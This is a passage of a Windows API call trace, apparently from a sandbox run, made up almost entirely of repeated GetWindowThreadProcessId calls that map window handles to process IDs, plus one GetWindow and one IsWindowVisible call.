	[0471.165] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xc0c
	[0471.166] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xb08
	[0471.166] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x948
	[0471.166] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1178
	[0471.166] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x13e0
	[0471.166] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xcd0
	[0471.166] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x13fc
	[0471.166] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xdc8
	[0471.166] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xc18
	[0471.166] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xc2c
	[0471.166] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xa1c
	[0471.166] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1244
	[0471.167] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xdb0
	[0471.167] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1398
	[0471.167] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1358
	[0471.167] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1370
	[0471.167] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1340
	[0471.167] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x130c
	[0471.167] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x12c0
	[0471.167] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x12e4
	[0471.167] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1270
	[0471.167] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1298
	[0471.168] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x120c
	[0471.168] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x122c
	[0471.168] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x11c4
	[0471.168] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x11b0
	[0471.168] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1188
	[0471.168] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1148
	[0471.168] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1160
	[0471.168] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x10fc
	[0471.168] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xe34
	[0471.168] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xea4
	[0471.168] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x514
	[0471.169] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xe48
	[0471.169] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xbc8
	[0471.169] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xdf8
	[0471.169] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x318
	[0471.169] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xcac
	[0471.169] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x8bc
	[0471.169] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xf9c
	[0471.169] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xf48
	[0471.169] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xe40
	[0471.169] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xecc
	[0471.170] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xeb8
	[0471.170] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xe80
	[0471.170] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xe98
	[0471.170] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xe60
	[0471.170] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xee4
	[0471.170] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xf00
	[0471.170] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xdf0
	[0471.170] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xe1c
	[0471.171] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xdd0
	[0471.171] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xd94
	[0471.171] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xd74
	[0471.171] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xd00
	[0471.171] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xcd8
	[0471.171] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xc84
	[0471.171] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xca4
	[0471.171] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xc64
	[0471.171] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xc24
	[0471.171] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xb84
	[0471.171] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xbac
	[0471.172] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x384
	[0471.172] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xab8
	[0471.172] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x33c
	[0471.172] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xa44
	[0471.172] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xa64
	[0471.172] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x8a8
	[0471.172] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xaf0
	[0471.172] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x88c
	[0471.173] GetWindow (hWnd=0x102c0, uCmd=0x4) returned 0x0
	[0471.174] IsWindowVisible (hWnd=0x102c0) returned 0
	[0471.174] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xb04
	[0471.174] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x910
	[0471.174] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x230
	[0471.174] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xac0
	[0471.174] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xab4
	[0471.174] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xaac
	[0471.175] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x3d0
	[0471.175] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x978
	[0471.175] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xa7c
	[0471.175] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x59c
	[0471.175] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xa88
	[0471.175] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xa6c
	[0471.175] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xa68
	[0471.175] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x9f8
	[0471.175] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xa04
	[0471.175] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x924
	[0471.175] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x8dc
	[0471.176] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x7dc
	[0471.176] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x768
	[0471.176] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x764
	[0471.176] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x820
	[0471.176] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x810
	[0471.176] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x794
	[0471.176] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x83c
	[0471.176] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x7ac
	[0471.176] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xb44
	[0471.176] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xb5c
	[0471.176] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x838
	[0471.177] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4d0
	[0471.177] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4d0
	[0471.177] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4d0
	[0471.177] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4d0
	[0471.177] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4d0
	[0471.177] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4d0
	[0471.177] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4d0
	[0471.177] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4d0
	[0471.177] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x818
	[0471.177] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x5b8
	[0471.178] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x494
	[0471.178] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1ec
	[0471.178] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x440
	[0471.178] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x7e8
	[0471.178] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x730
	[0471.178] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x2c8
	[0471.178] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x31c
	[0471.178] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x330
	[0471.178] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x128
	[0471.178] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x5c8
	[0471.179] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x6f8
	[0471.179] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x358
	[0471.179] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x73c
	[0471.179] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xb0
	[0471.179] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x250
	[0471.179] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x240
	[0471.179] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x790
	[0471.179] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x61c
	[0471.179] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x540
	[0471.179] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x538
	[0471.179] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x568
	[0471.180] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x538
	[0471.180] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x568
	[0471.180] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x538
	[0471.180] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x540
	[0471.180] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x540
	[0471.180] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x57c
	[0471.180] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x460
	[0471.180] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x554
	[0471.180] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4d0
	[0471.180] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x528
	[0471.181] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4d0
	[0471.181] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4d0
	[0471.181] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4d0
	[0471.181] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x79c
	[0471.181] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4d0
	[0471.181] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4e0
	[0471.181] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4d0
	[0471.181] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x460
	[0471.181] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x460
	[0471.181] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x44c
	[0471.181] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x778
	[0471.182] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x460
	[0471.182] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x558
	[0471.182] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4d0
	[0471.182] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x4d0
	[0471.182] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1198
	[0471.182] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1080
	[0471.182] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1074
	[0471.182] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x106c
	[0471.182] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1474
	[0471.182] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1414
	[0471.183] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xbd0
	[0471.183] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x550
	[0471.183] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xa38
	[0471.183] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x16d0
	[0471.183] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x16d4
	[0471.183] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x15bc
	[0471.183] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x15a0
	[0471.183] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x159c
	[0471.183] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1598
	[0471.183] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1594
	[0471.183] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1590
	[0471.184] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x158c
	[0471.184] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1588
	[0471.184] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1584
	[0471.184] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1580
	[0471.184] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x157c
	[0471.184] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1488
	[0471.184] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1404
	[0471.184] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x11b8
	[0471.184] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xbd4
	[0471.184] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xe0c
	[0471.185] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xd30
	[0471.185] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xe70
	[0471.185] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x13b8
	[0471.185] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xe20
	[0471.185] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xe2c
	[0471.185] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xe00
	[0471.185] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xe04
	[0471.185] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xc94
	[0471.185] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x13b0
	[0471.185] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x13ac
	[0471.185] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x13a8
	[0471.186] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1374
	[0471.186] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x132c
	[0471.186] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1328
	[0471.186] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x12d0
	[0471.186] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x12cc
	[0471.186] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x12c8
	[0471.186] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1290
	[0471.187] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1218
	[0471.187] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1214
	[0471.187] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x11ec
	[0471.187] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x11e8
	[0471.187] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x11cc
	[0471.187] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x1140
	[0471.187] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xe6c
	[0471.187] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0x6e8
	[0471.187] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0xed740 | out: lpdwProcessId=0xed740) returned 0xc6c
